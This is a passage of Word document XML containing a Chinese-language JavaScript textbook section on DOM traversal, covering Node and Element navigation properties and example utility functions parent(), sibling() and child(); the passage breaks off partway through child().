      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点的文本内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素的标签名，以大写形式表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用这些</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以用以下类似的表达式得到文档的第一个子节点下面的第二个子节点的引用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.childNodes[0].childNodes[1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.firstChild.firstChild.n</w:t>
      </w:r>
      <w:r>
        <w:t>extSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设上述提到的文档代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Hello World!</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/body</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>那么第一个子节点下面的第二个子节点就是＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，它的</w:t>
      </w:r>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"BODY"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但请注意，该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>对文档文本的变化及其敏感。例如，如果修改了文档，在＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间插入一个新行，那么表示该新行的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点就是文档的第一个子节点下面的第一个子节点，并且＜</w:t>
      </w:r>
      <w:r>
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t>ad</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素就是第二个子节点而不是＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="15_3_2_Zuo_Wei_Yuan_Su_Shu_De_Wen_Dang_"/>
      <w:r>
        <w:t>15.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为元素树的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当将主要的兴趣点集中在文档中的元素上而非它们之间的文本（和它们之间的空白）上时，我们可以使用另外一个更有用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。它将文档看做是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象树，忽略部分文档：</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的第一部分是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>属性。类似</w:t>
      </w:r>
      <w:r>
        <w:t>ChildNodes</w:t>
      </w:r>
      <w:r>
        <w:t>，它也是一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但不同的是</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>列表只包含</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>并非标准属性，但是它在所有当前的浏览</w:t>
      </w:r>
      <w:r>
        <w:t>器中都能工作。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>已经实现有一段很长的时间了，其他大多数浏览器也已如法炮制。最后采纳它的主流浏览器是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点没有</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它意味着上述</w:t>
      </w:r>
      <w:r>
        <w:t>Node.parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>属性不可能返回</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。任何</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>总是另一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，或者，追溯到树根的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>基于元素的文档遍历</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的第二部分是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>属性，后者类似</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象的子属性和兄弟属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>firstElementChild,lastElementChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastChild</w:t>
      </w:r>
      <w:r>
        <w:t>，但只代表子</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nextElementSibling,previousElementSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>nextSibling</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>previousSibling</w:t>
      </w:r>
      <w:r>
        <w:t>，但只代表兄弟</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>childElementCount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>子元素的数量。返回的值和</w:t>
      </w:r>
      <w:r>
        <w:t>children.length</w:t>
      </w:r>
      <w:r>
        <w:t>值相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>子元素和兄弟元素的属性是标准属性，并在除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>之外的浏览器中都已实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于逐个元素的文档遍历的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>并未完全标准化，我们仍然可以通过像例</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>中可移植的遍历函数那样来实现这种功能：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>：可移植的文档遍历函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>层祖先元素，如果不存在此类祖先或祖先不是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>（例如</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>）则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>本身。如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>（或省略），则返回其父元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回其祖父元素，依次类推</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function parent(e,n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n===undefined)n=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(n--</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e)e=e.parentNode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!e||e.nodeType!==1)return null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return e;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为正，返回后续的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为负，返回前面的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为零，返回</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>本身</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function sibling(e,n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>n!==0){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>未定义，即刻返回它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0){//</w:t>
      </w:r>
      <w:r>
        <w:t>查找后续的兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.nextElementSibling)e=e.nex</w:t>
      </w:r>
      <w:r>
        <w:t>tElementSibling;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(e=e.nextSibling;e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.nodeType!==1;e=e.nextSibling)/*</w:t>
      </w:r>
      <w:r>
        <w:t>空循环</w:t>
      </w:r>
      <w:r>
        <w:t>*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n--;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>查找前面的兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.previousElementSibing)e=e.previousElementSibling;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(e=e.previousSibling;e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.nodeType!==1;e=e.previousSibling)/*</w:t>
      </w:r>
      <w:r>
        <w:t>空循环</w:t>
      </w:r>
      <w:r>
        <w:t>*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return e;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>代子元素，如果不存在则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>负值</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>代表从后往前计数。</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>表示第一个子元素，而</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>代表最后一个，</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>代表倒数第二个，依次类推</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function child(e,n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.children){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
